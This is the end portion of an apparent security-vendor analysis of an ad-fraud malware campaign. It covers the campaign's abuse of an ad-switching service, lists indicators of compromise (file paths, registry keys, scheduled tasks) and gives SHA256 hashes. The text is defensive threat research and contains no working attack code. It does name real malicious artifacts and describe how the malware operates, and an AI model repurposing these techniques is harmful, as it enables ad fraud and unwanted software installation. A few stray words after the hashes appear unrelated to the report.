PhantomJS/infected user browsers, we detected a redirection to a JavaScript located at

http://delivery.us.myswitchads.com (together with a user ID), which finally fetches and

displays adverts from different advertisers.

Figure 42 – Fetching adverts from the adverts provider.

30


The site http://myswitchads.com is owned by Switch Concepts Ltd.29, which provides Switch, the

adverts auction system30 for advertisers and publishers (i.e. owners of web pages, where the adverts

are inserted). Based on these findings, our best guess is that the authors of this malware misuse

this31 adverts-switching system by being both a provider (e.g. http://www.freewebseotools.com)

and consumer (i.e. end-user via the browser injections on the infected PCs) at the same time. This

makes another victim – the advertisers who think they paid for impressions by users, not by malware

somewhere in a background of an infected PC.

29 http://www.switchconcepts.com 30 https://vimeo.com/95500195 31 We also detected misuse of other advert providers while analyzing this malware campaign.

http://www.switchconcepts.com/

https://vimeo.com/95500195

31


8 Conclusion and Indicators of Compromise

The malicious code presented in this post is yet another profit-driven malware, which may not seem

so dangerous on the first sight. However, there is nothing like a "safe malware" and it always has to

be considered as a threat. In this case, the used techniques are not only annoying for the user, but

also dangerous. For example, the malware is downloading and installing unknown executables from

remote servers without a user’s permission, it silently communicates with remote servers,

circumvents security policies (silent installation of browser extensions and their overwriting by

malicious code), sends information about the visited pages to remote servers, and forces users to

visit unsafe websites and advertisements.

Therefore, it is not possible to tolerate such malicious behavior. AVG customers are protected

against these threats via our multi-level protection in the AVG Internet Security. The others may at

least check their systems via the following indicators of compromise.

IOC (Indicators of Compromise)

Files:

"C:\Users\{UserName}\AppData\Roaming\PlusN\GUP.exe";

"C:\Users\{UserName}\Documents\benko\rut.exe";

"C:\ProgramData\Convertor\Convertor.exe";

"C:\Users\{UserName}\AppData\Roaming\pdfie\PdfConv_{32/64}.dll";

"C:\Program Files (x86)\Mozilla Firefox\distribution\bundles\firefox\install.

rdf" or "C:\Program Files (x86)\Mozilla Firefox\distribution\bundles\jason@sch

ober.net” containing AdTech references;

"C:\Users\{UserName}\AppData\Local\Google\Chrome\User Data\Default\Extension

s\okanipcmceoeemlbjnmnbdibhgpbllgc\{version}\background_with_deps.js" or the

other extension "…\ooabkmkhabkahcjbgpiajffckeibpdoa\{version}\js\background.js"

containing AdTech references;

"C:\Users\{UserName}\AppData\Roaming\{random string}\rinti.exe";

"C:\Users\{UserName}\AppData\Roaming\ornaldo\de10.exe" and other files and folders

in this folder.

Registry keys:

"SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ext\CLSID\{437B9306-

2FDE-4054-A3C9-6B49507C12D0}" – "Vonteera";

"SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ext\CLSID\{934B156A-

3D17-3981-B78A-5C138F423AD6}" – "AdTech".

Scheduled tasks:

DE10 (de10.exe);

DriveMgr, blockerpro, Hubsy (rinti.exe);

mdb, mdb01 (mdb.exe);

WinKit, realtor, "App Update", "Application Update", etc. (GUP.exe);

Random short string such as (ZtH or zZt) (Convertor.exe).

32


Appendix A – SHA256 Check-sums of Analyzed Samples

28b57f5948a19a65960a3ad82a37fe355d487c6c5a34f45aa3a95288fa881970 – WeatherAppSetup.exe

ec8e616f728f035d09ab43b070187b98b15a8ca93b83daddee7199dff5411db2 – 5.exe

20ac2bf67caffe00fcd8987787acd0cbe1b6b4c25dc56181c0346178c0f19ea5 - rinm.exe

74bc812d1e617dead08170548c629269784e0cbf45026312dc3d91cb0699ea7e – LiteC.exe

c05dae7fef3a838184f33f3ef0ebe1f44c3c24bde58c3b24ca53b662b2d81354 – Ob.dat (RAR)

ec1f3978c264046e9dc4bfe5063fd7a27c4f42cf715bb2ce0947455092e375c8 – de10.exe

7c3e325bfc86417cbedd0a2c9048dd59d1ca29b8de0706bce1d3f1697856f9f3 – GUP.exe

39e4ad466f912c0a5f09bfbcc39d04962c8f8e958bd8dfda686088d6d412fe0d – GUP.xml

f5bc980a4227da5279b29da561411e81522540a90a1ab6bd4938147f04465c96 – PdfConv_32.dll

29f0a7cdbc76fd8b52aa329a063eeb2e57b964d661a06e920cbce5e583e5c864 – PdfConv_64.dll

b7bf1138db20610096b34c6eb1fa3b3e8f30ccd20011b7adcfb815aee516b711 – rinti.exe

--------------------------- Updates ----------------------------

019d36b5676ad04e9f37b06c15a58935e599546bc3694ce689bae57563a41276

01b89ccf019c34fdbcd678a965cb38a50d2bede94db2fad6b3a7782eb98e52d3

02d1369846caaef5e42ce4d34f09de992931569b3cd894d80c070c54a1ea2a76

0fe8d7af28a13399585befe2206b67b81ff20042cc4263a02182748af264b5ba

11eb70c57c9f1c7b23418e74447bfa1bfd4c14978a479df980c45597ec9b6463

27e43e7c7e0dc04754bf66c5a4eac78d51756e68eb7bcdd18c2a133aa9b01b89

2ab29f8bd5fa5664a9ba7f603e1a9457b6f0b3f5a02af8900eca1ffd86002f1d

46381ce79606bb7145b3c6400f9a89abf475b9d3154043dfb6e7b53038ab944e

474c4e7e763955a641225b1502a4c1198b6b713d1fbdf116d3a0be5d3e2d0440

502d56d05cd168a1ddb3d472635f09be4a485d341d4d93f5ae540fd9763e0dcb

64725587c60a64b3c371cc84aae5eb743f4848c4efd0b0b7e8b84b26bdca900e

93942c925769b3fed9756ad45c39e64327b284fdd08d406dd4266e003a400fda

9708bb732e28417e2591cc95b4429e7562e509285d46a8f1d3d7608ad5b09efc

a297e00c6603cfac4714ee08edaf817bdc4b91464db0fe1f9c9717822d1c6fe3

b5405d08cff31b3629b6fcdb8e013da1f959fbd72373d3d1aaf682cf7a1a0341

d2eb16d0da95e7cb9d086fe2865e78e238499149b22467b0d9607e203af457d5

e5ed76a92362a9198583b997e7b6ded321fc5675fcdd99053ed1dbd57bdd284b

eaedb037b213673181633cb3adf16022badfd6f156dbe3d28112c0009416b84c

ed1cd482a554539ba765862068d8f7a6277c567fec2de838d7f44522416df905

f698a22e9805d4fca8e18e1ae7f7a28b3fd9328ff896b7a51f7677173b5c0512

weather forecast for today? advert flood coming from east

Software